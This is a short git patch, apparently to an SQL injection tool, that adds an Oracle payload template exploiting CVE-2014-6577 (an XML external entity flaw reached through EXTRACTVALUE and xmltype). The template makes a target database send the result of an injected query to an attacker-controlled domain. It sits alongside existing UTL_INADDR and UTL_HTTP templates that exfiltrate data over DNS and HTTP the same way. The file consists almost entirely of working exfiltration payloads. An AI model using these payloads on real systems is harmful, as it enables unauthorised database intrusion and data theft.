From faa2e59e5f829dbc37f7070f0591394881f1ecc3 Mon Sep 17 00:00:00 2001
From: marvin <marvin@debian-BULLSEYE-live-builder-AMD64>
Date: Fri, 5 May 2023 18:04:20 +0200
Subject: [PATCH] add support to leverage CVE-2014-6577 for Oracle DNS data
 exfiltration

---
 data/procs/oracle/dns_request.sql | 1 +
 1 file changed, 1 insertion(+)

diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
index adb71cfb2..5dda762c0 100644
--- a/data/procs/oracle/dns_request.sql
+++ b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual